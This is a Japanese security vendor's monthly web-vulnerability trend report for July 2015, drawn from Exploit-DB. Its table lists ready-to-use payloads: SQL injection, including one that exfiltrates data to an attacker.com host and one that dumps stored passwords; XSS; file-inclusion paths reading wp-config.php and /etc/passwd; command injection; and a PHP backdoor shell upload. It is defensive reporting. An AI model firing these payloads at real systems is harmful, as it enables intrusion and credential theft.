• 検索結果がありません。

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

N/A
N/A
Protected

Academic year: 2021

シェア "サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー"

Copied!
7
0
0

読み込み中.... (全文を見る)

全文

(1)
(2)

1. 脆弱性別件数

脆弱性カテゴリ 件数

SQL インジェクション

(SQL Injection) 15 クロス サイト スクリプティング

(Cross Site Scripting:XSS) 11 ローカルファイル挿入

(Local File Inclusion:LFI) 6 コマンドインジェクション (Command Injection) 4 ディレクトリトラバーサル (Directory Traversal) 1 ファイルアップロード (File Upload) 1 合計 38 2. 危険度別件数 危険度 件数 割合 早急対応要 9 24% 高 28 76% 合計 37 100% 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 6 16% 中 6 16% 易 26 68% 合計 38 100% 4. 主なソフトウェア別脆弱性発生件数 件数 12 4 4 3 3 3 2 1 1 1 1 1 1 1 38 合計 phpFileManager Arab Portal Hawkeye-G phpFileManag phpSQLiteCMS phpliteadmin sysPass 最新Web脆弱性トレンドレポート(2015.07) 2015.07.01~2015.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 サマリー ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム ソフトウェア名 ZenPhoto SO Planning 2015年7月に公開されたExploit-DBを分析した結果、SQLインジェクション(SQL Injection)攻撃に対する脆弱性が最も多く報告されました。SQLインジェクション攻撃は、攻撃が可能かどうかを判断する単純なク エリーから、直接情報を抜き出すクエリー、そしてシステムに一時的な障害を起こし、攻撃を試みるクエリーまで、攻撃難易度から見ると、非常に多様であったことが分かりました。SQLインジェクション攻撃はその特性上、 攻撃が成功になると2次攻撃を仕掛け、システム上の機密情報や個人情報が漏洩される可能性があるため、危険度が非常に高い攻撃です。主要ソフトウェア別の脆弱性発生状況を見ると、WordPressを含め、6 つのソフトウェアにて(WordPress, Arap Portal, Centreon, SO Planning, sysPass, Joomla) SQLインジェクション攻撃が発見されました。これらのソフトウェアを使用する企業の管理者様は、セキュアコーディ ングの適用と定期的なアップデートを行い、SQLインジェクション攻撃にさらされないよう、注意してください。 WordPress Joomla Xceedium Xsuite ArticleFR Centreon 15 11 6 4 1 1 0 2 4 6 8 10 12 14 16

脆弱性別件数

9 28

危険度別分類

早急対応要 高 6 6 26

攻撃実行の難易度別件数

難 中 易 12 4 4 3 3 3 2 1 1 1 1 1 1 1 0 2 4 6 8 10 12 14

主なソフトウェア別脆弱性発生件数

WordPress ZenPhoto SO Planning Joomla Xceedium Xsuite ArticleFR Centreon Hawkeye-G phpFileManager Arab Portal phpFileManag phpSQLiteCMS phpliteadmin sysPass

(3)

最新Web脆弱性トレンドレポート(2015.07) 2015.07.01~2015.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 :情報漏洩    するため、高度な攻撃コードを採用したパターン、知らされていない攻撃    コードを採用したパターンのいずれかに該当する ** 5件以上発生した主なソフトウェア別脆弱性の詳細情報 EDB 番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 ソフトウェア名

37464 SQL Injection 易 高 WordPress Albo Pretorio Online 3.2 - /albo-folder/ SQL

Injection 脆弱性 WordPress

37464 SQL Injection 易 高 WordPress Albo Pretorio Online 3.2 - admin.php SQL

Injection 脆弱性 WordPress

37514 File Upload 易 高 WordPress ACF Frontend Display Plugin 2.0.5 - index.php

File Upload 脆弱性 WordPress 37534 SQL Injection 易 高 WordPress Easy2Map Plugin 1.24 - admin-ajax.php SQL

Injection 脆弱性 WordPress

37560 SQL Injection 易 高 WordPress CP Multi View Event Calendar Plugin 1.1.7

-/wordpress/ SQL Injection 脆弱性 WordPress 37559 LFI 易 早急対応要 WordPress CP Image Store with Slideshow Plugin 1.0.5

-/wp-path/ LFI 脆弱性 WordPress 37603 SQL Injection 易 高 WordPress CP Contact Form with Paypal Plugin 1.1.5

-admin.php SQL Injection 脆弱性 WordPress 37603 XSS 易 中 WordPress CP Contact Form with Paypal Plugin 1.1.5 -admin.php XSS 脆弱性 WordPress 37629 LFI 易 高 WordPress BuddyPress Activity Plus Plugin 1.5 -

admin-ajax.php LFI 脆弱性 WordPress 37707 SQL Injection 難 高 WordPress Count Per Day Plugin 3.4 - counter-options.php

SQL Injection 脆弱性 WordPress 37705 SQL Injection 中 高 WordPress Unite Gallery Lite Plugin 1.4.6 - admin-ajax.php

SQL Injection 脆弱性 WordPress 37705 SQL Injection 中 高 WordPress Unite Gallery Lite Plugin 1.4.6 - admin.php SQL

Injection 脆弱性 WordPress    既知の攻撃コードを採用したパターンのいずれかに該当する 攻撃実行難易度分類基準 難:複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得 危険度分類基準 早急対応要:攻撃が成功した場合システムへ侵入可 :システム情報を取得するか、あるいはクライアントに2次被害を及ぼす :1回のリクエストで攻撃が成立するパターン、複数回トライするも、 :攻撃手法自体は難しくないが、迂回コードを採用したパターン

(4)

日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境

2015/07/02 37464 SQL Injection 易 高

WordPress Albo Pretorio Online 3.2 - /albo-folder/ SQL Injection 脆弱性 /albo-folder/?action=visatto&id=1%20and%201=1 WordPress WordPress Albo Pretorio Online 3.2 2015/07/02 37464 SQL Injection 易 高

WordPress Albo Pretorio Online 3.2 - admin.php SQL Injection 脆弱性 /wp-admin/admin.php?page=responsabili&action=edit&id =1%20and%201=1 WordPress WordPress Albo Pretorio Online 3.2 2015/07/07 37515 XSS 易 高 phpliteadmin 1.1 -phpliteadmin.php XSS 脆弱性 /sectest/phpliteadmin_v1-1/phpliteadmin.php?droptable= <script>alert(666)</script> phpliteadminphpliteadmin 1.1 2015/07/07 37514 File Upload 易 高

WordPress ACF Frontend Display Plugin 2.0.5 -index.php File Upload 脆弱性

POST /wp-content/plugins/acf-frontend- display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php HTTP/1.1 Host:

Connection: Close

Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)

Content-Type: multipart/form-data; boundary=---7dd10029908f2

---7dd10029908f2 Content-Disposition: form-data; name="Filedata"; filename="evil.php" Content-Type: application/octet-stream <? phpinfo(); ?> ---7dd10029908f2--WordPress WordPress ACF Frontend Display Plugin 2.0.5 2015/07/08 37528 SQL Injection 中 高 Centreon 2.5.4 -GetXmlTree.php SQL Injection 脆弱性 /centreon/include/common/XmlTree/GetXmlTree.php? si d=%27%2Bif(1%3C0,sleep(1),%27%27)%2B%27 Centreon Centreon 2.5.4 2015/07/08 37528 Command Injection 中 早急対応要 Centreon 2.5.4 - ge tStats.php Command Injection 脆弱性 /centreon/include/Administration/corePerformance/ge tStats.php?ns_id=|+more+/etc/passwd+%23&key=a ctive_service_check&start=today&session_id=abc Centreon Centreon 2.5.4 2015/07/08 37534 SQL Injection 易 高

WordPress Easy2Map Plugin 1.24 - admin-ajax.php SQL Injection 脆弱性

POST /wp-admin/admin-ajax.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 mapID=11&mapName='+or+1%3D1%3B&action=e2 m_img_save_map_name WordPress WordPress Easy2Map Plugin 1.24 2015/07/10 37560 SQL Injection 易 高

WordPress CP Multi View Event Calendar Plugin 1.1.7 -/wordpress/ SQL Injection 脆 弱性 /wordpress/?action=data_management&cpmvc_do_a ction=mvparse&f=edit&id=1%20and%201=1 WordPress WordPress CP Multi View Event Calendar Plugin 1.1.7 2015/07/10 37559 LFI 易 早急対応要

WordPress CP Image Store with Slideshow Plugin 1.0.5 -/wp-path/ LFI 脆弱性 /wp-path/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLA B@intermal.com&f=../../../../wp-config.php WordPress WordPress CP Image Store with Slideshow Plugin 1.0.5 2015/07/13 37604 SQL Injection 難 早急対応要 SO Planning 1.32 -planning.php SQL Injection 脆 弱性 POST /process/planning.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

filtreGroupeProjet=1&projet_anything=anything') union all select

111,table_name,333,444,555,666,777,888,999 from information_schema.tables# SO Planning SO Planning 1.32 2015/07/13 37604 SQL Injection 難 早急対応要 SO Planning 1.32 -user_groupes.php SQL Injection 脆弱性 /user_groupes.php?page=1&order=1,(select%20case %20when%20(1=1)%20then%201%20else%201*(se lect%201%20from%20information_schema.tables)en d)=1&by= SO Planning SO Planning 1.32 2015/07/13 37604 SQL Injection 難 早急対応要 SO Planning 1.32 -groupe_list.php SQL Injection 脆弱性 /groupe_list.php?page=1&order=1,(select%20case% 20when%20(1=0)%20then%201%20else%201*(sele ct%201%20from%20information_schema.tables)end) SO Planning SO Planning 1.32 最新Web脆弱性トレンドレポート(2015.07) 2015.07.01~2015.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

(5)

日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境

最新Web脆弱性トレンドレポート(2015.07)

2015.07.01~2015.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

2015/07/13 37603 SQL Injection 易 高

WordPress CP Contact Form with Paypal Plugin 1.1.5 -admin.php SQL Injection 脆弱 性 /wp-admin/admin.php?page=cp_contact_form_paypal&u= 6&r=0.558320934244582&name=csrf1">Update WordPress WordPress CP Contact Form with Paypal Plugin 1.1.5 2015/07/13 37603 XSS 易 中

WordPress CP Contact Form with Paypal Plugin 1.1.5 -admin.php XSS 脆弱性

POST

/wp-admin/admin.php?page=cp_contact_form_paypal&cal =11&r=0.81280830806042 HTTP/1.1

Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

fp_message=The following contact message has been sent:<%INFO%>&lt;/textarea&gt;<script>alert(1);< /script> WordPress WordPress CP Contact Form with Paypal Plugin 1.1.5 2015/07/13 37602 XSS 易 高 ZenPhoto 1.4.8 - admin-upload.php XSS 脆弱性 /zenphoto-zenphoto-1.4.8/zp-core/admin-upload.php?error=%26lt%3Bscript%26gt%3Balert(1) %26lt%3B%2Fscript%26gt%3B ZenPhoto ZenPhoto 1.4.8 2015/07/13 37602 XSS 易 高 ZenPhoto 1.4.8 -backup_restore.php XSS 脆弱 性 /zenphoto-zenphoto-1.4.8/zp-core/utilities/backup_restore.php?compression=%26lt %3Bscript%26gt%3Balert%281%29%26lt%3B%2Fsc ript%26gt%3B ZenPhoto ZenPhoto 1.4.8 2015/07/13 37602 XSS 易 高 ZenPhoto 1.4.8 - admin.php XSS 脆弱性 /zenphoto-security-fixes/zp-core/admin.php?action=external&error=" onmouseover="alert('xsstest')" foo="bar&msg=hover over me! ZenPhoto ZenPhoto 1.4.8 2015/07/13 37602 Directory Traversal 易 高 ZenPhoto 1.4.8 - admin-themes-editor.php Directory Traversal 脆弱性 /zenphoto-zenphoto-1.4.8/zp-core/admin-themes-editor.php?theme=../../../../../var/www&file=secret.p hp ZenPhoto ZenPhoto 1.4.8 2015/07/13 37596 XSS 易 高 ArticleFR 3.0.6 -/dashboard/settings/categori es/ XSS 脆弱性 POST /dashboard/settings/categories/ HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 name="><script>alert(1)</script> ArticleFR ArticleFR 3.0.6 2015/07/13 37596 XSS 易 高 ArticleFR 3.0.6 -/dashboard/settings/links/ XSS 脆弱性 POST /dashboard/settings/categories/ HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 title="><script>alert(1)</script> ArticleFR ArticleFR 3.0.6 2015/07/13 37596 XSS 易 高 ArticleFR 3.0.6 -/dashboard/tools/pingservers / XSS 脆弱性 POST /dashboard/tools/pingservers/ HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 url=http://www.zeroscience.mk"><script>alert(4)</s cript> ArticleFR ArticleFR 3.0.6

2015/07/13 37594 SQL Injection 難 早急対応要 Arab Portal 3 - members.php SQL Injection 脆弱性

POST members.php?action=singup HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

showemail=1' AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) AND 'ali-ahmady'='ali-ahmady

(6)

日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 最新Web脆弱性トレンドレポート(2015.07) 2015.07.01~2015.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 2015/07/13 37588 XSS 中 高 phpSQLiteCMS - index.php XSS 脆弱性 /ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=comments&type=0& edit=49&comment_id="/><script>alert('XSS by hyp3rlinx '%2bdocument.cookie)</script>&page=1 phpSQLiteC MS phpSQLiteC MS 2015/07/14 37610 SQL Injection 難 早急対応要 sysPass 1.0.9 -ajax_search.php SQL Injection 脆弱性 POST members.php?action=singup HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

search=getAccounts') UNION ALL SELECT NULL,NULL,account_name,account_login,account_pas s,account_url,NULL,NULL,NULL,NULL,NULL from accounts --&start=0&skey=1&sorder=1&sk=081bad3198bdb3cd 29133befc57d60287541663b&is_ajax=1&customer=0 &category=0&rpp=10 sysPass sysPass 1.0.9

2015/07/15 37620 LFI 易 高 Joomla DOCman Component

- configuration.php LFI 脆弱性 /components/com_docman/dl2.php?archive=0&file=.. /../../../../../../target/www/configuration.php Joomla Joomla DOCman Component 2015/07/17 37629 LFI 易 高 WordPress BuddyPress Activity Plus Plugin 1.5 -admin-ajax.php LFI 脆弱性

POST /wp-admin/admin-ajax.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 data=bpfb_photos[]=../../../../wp-config.php WordPress WordPress BuddyPress Activity Plus Plugin 1.5 2015/07/21 37666 SQL Injection 易 高

Joomla! Helpdesk Pro Plugin < 1.4.0 - index.php SQL Injection 脆弱性 POST /index.php?option=com_helpdeskpro&view=tickets HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 search=&category_id=0&status_id=-1&limit=10&limitstart=0&option=com_helpdeskpro&t ask=&boxchecked=0&filter_order=SLEEP('10')&filter_ order_Dir=DESC Joomla Joomla! plugin Helpdesk Pro < 1.4.0

2015/07/21 37666 LFI 易 早急対応要 Joomla! Helpdesk Pro Plugin < 1.4.0 - / LFI 脆弱性 /?option=com_helpdeskpro&task=ticket.download_att achment&filename=/../../../../../../../../../../../../etc/p asswd&original_filename=AnyFileName.exe Joomla Joomla! plugin Helpdesk Pro < 1.4.0 2015/07/27 37708 Command Injection 易 高

Xceedium Xsuite - login.php Command Injection 脆弱性

POST /login.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 id=admin'|cat /etc/passwd||a%20%23|&pass=admin&authTypeOpti on=use_local&loginID= Xceedium Xsuite Xceedium Xsuite 2015/07/27 37708 XSS 易 高 Xceedium Xsuite -ajax_cmd.php XSS 脆弱性 /ajax_cmd.php?cmd=COMPLETGRAPHYRECORDING&f ileName=<img%20src%3da%20onload%3dalert(1)> Xceedium Xsuite Xceedium Xsuite 2015/07/27 37708 LFI 易 高 Xceedium Xsuite -read_sessionlog.php LFI 脆弱 性 /opm/read_sessionlog.php?logFile=....//....//....//....// etc/passwd Xceedium Xsuite Xceedium Xsuite

(7)

日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境

最新Web脆弱性トレンドレポート(2015.07)

2015.07.01~2015.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

2015/07/27 37707 SQL Injection 難 高

WordPress Count Per Day Plugin 3.4 - counter-options.php SQL Injection 脆 弱性 POST /wp-admin/options-general.php?page=count-per-day/counter-options.php&tab=tools HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

cpd_keep_month=6 MONTH) AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116 ),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR( 114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CH AR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98), CHAR(97),CHAR(114)))) -- 2 WordPress WordPress Count Per Day Plugin 3.4 2015/07/27 37705 SQL Injection 中 高

WordPress Unite Gallery Lite Plugin 1.4.6 - admin-ajax.php SQL Injection 脆弱性

POST /wp-admin//admin-ajax.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

data[galleryID]=1 AND (SELECT * FROM (SELECT(SLEEP(5)))rock) WordPress WordPress Unite Gallery Lite Plugin 1.4.6 2015/07/27 37705 SQL Injection 中 高

WordPress Unite Gallery Lite Plugin 1.4.6 - admin.php SQL Injection 脆弱性 /wp-admin/admin.php?page=unitegallery&view=items&gal leryid=1%20AND%20(SELECT%20*%20FROM%20(S ELECT(SLEEP(5)))rock) WordPress WordPress Unite Gallery Lite Plugin 1.4.6 2015/07/27 37700 XSS 易 高 Hawkeye-G v3.0.1.4912 Persistent XSS -/interface/rest/accounts/json XSS 脆弱性 POST /interface/rest/accounts/json HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 name=<script>alert(666)</script> Hawkeye-G Hawkeye-G v3.0.1.4912 Persistent XSS 2015/07/28 37709 Command Injection 易 高 phpFileManager 0.9.8 -index.php Command Injection 脆弱性(1) /phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htd ocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe phpFileMana g phpFileMana ger 0.9.8 2015/07/29 37712 Command Injection 中 高 phpFileManager 0.9.8 -index.php Command Injection 脆弱性(2) POST /phpFileManager-0.9.8/index.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 file_data='<?php+echo+'backdoor shell by hyp3rlinx...';+exec($_GET['cmd']);+?> phpFileMana ger phpFileMana ger 0.9.8

参照

関連したドキュメント

攻撃者は安定して攻撃を成功させるためにメモリ空間 の固定領域に配置された ROPgadget コードを用いようとす る.2.4 節で示した ASLR が機能している場合は困難とな

特に、耐熱性に優れた二次可塑剤です(DOSより良好)。ゴム軟化剤と

製品開発者は、 JPCERT/CC から脆弱性関連情報を受け取ったら、ソフトウエア 製品への影響を調査し、脆弱性検証を行い、その結果を

妊婦又は妊娠している可能性のある女性には投与しない こと。動物実験(ウサギ)で催奇形性及び胚・胎児死亡 が報告されている 1) 。また、動物実験(ウサギ

12月 米SolarWinds社のIT管理ソフトウェア(orion platform)の

「系統情報の公開」に関する留意事項

Oracle WebLogic Server の脆弱性 CVE-2019-2725 に関する注 意喚起 ISC BIND 9 に対する複数の脆弱性に関する注意喚起 Confluence Server および Confluence

等に出資を行っているか? ・株式の保有については、公開株式については5%以上、未公開株